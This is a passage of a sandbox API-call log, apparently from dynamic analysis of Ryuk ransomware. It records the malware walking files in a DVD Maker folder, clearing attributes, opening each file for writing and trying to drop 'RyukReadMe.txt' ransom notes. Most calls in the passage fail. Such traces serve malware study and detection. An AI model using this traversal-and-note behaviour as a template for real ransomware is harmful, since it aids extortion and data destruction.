(normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-imagemask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.606] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.606] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.606] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.606] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.607] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png", dwFileAttributes=0x80) returned 0 [0133.607] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-shadow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.607] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.607] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.607] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.607] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.607] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png", dwFileAttributes=0x80) returned 0 [0133.607] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-backglow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.607] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.607] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.607] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.607] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.608] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png", dwFileAttributes=0x80) returned 0 [0133.608] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-border.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.608] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.608] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.608] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.608] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.608] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png", dwFileAttributes=0x80) returned 0 [0133.616] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-imagemask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.616] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.616] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.616] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.616] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.616] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png", dwFileAttributes=0x80) returned 0 [0133.616] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_notes-txt-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.617] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.617] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.617] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.617] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.617] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png", dwFileAttributes=0x80) returned 0 [0133.617] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\rollinghills.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.617] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.617] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.617] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.617] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.618] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv", dwFileAttributes=0x80) returned 0 [0133.618] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_intro_bg.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.618] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.618] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.618] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.618] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.618] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.619] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_intro_bg_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.619] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.619] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.619] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.619] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.619] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv", dwFileAttributes=0x80) returned 0 [0133.619] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_loop_bg.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.619] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.619] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.620] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.620] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.620] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.620] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_loop_bg_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.620] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.620] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.620] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.620] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.620] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv", dwFileAttributes=0x80) returned 0 [0133.620] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\title_page_ref.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.621] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.621] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.621] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.621] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.621] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.622] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\title_page_ref_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.622] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.622] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.622] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.622] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.623] SetLastError (dwErrCode=0x0) [0133.623] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.625] GetLastError () returned 0x5 [0133.625] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.625] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.625] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.625] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.625] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png", dwFileAttributes=0x80) returned 0 [0133.625] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.626] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.626] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.626] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.626] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.626] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png", dwFileAttributes=0x80) returned 0 [0133.626] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.626] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.626] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.626] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.626] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.627] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png", dwFileAttributes=0x80) returned 0 [0133.627] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.627] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.627] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.627] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.627] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.627] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.628] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.628] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.628] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.628] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.628] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.628] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.628] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.628] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.628] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.629] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.629] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.629] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png", dwFileAttributes=0x80) returned 0 [0133.629] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.629] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.629] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.629] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.629] SetLastError (dwErrCode=0x0) [0133.629] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.629] GetLastError () returned 0x5 [0133.629] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.629] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.629] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.631] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.631] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.631] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.631] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0133.631] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.631] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.631] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.631] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.631] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.631] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png", dwFileAttributes=0x80) returned 0 [0133.632] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\1047_576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.632] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.632] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.632] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.632] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.632] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.632] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.632] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.632] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.632] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.632] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.633] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.633] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.633] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.633] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.633] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.633] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.633] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.633] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.633] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.633] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.634] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.634] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.634] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.634] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.634] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.634] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.634] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.634] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.634] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.634] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.635] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.635] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.635] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.635] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.635] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.635] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 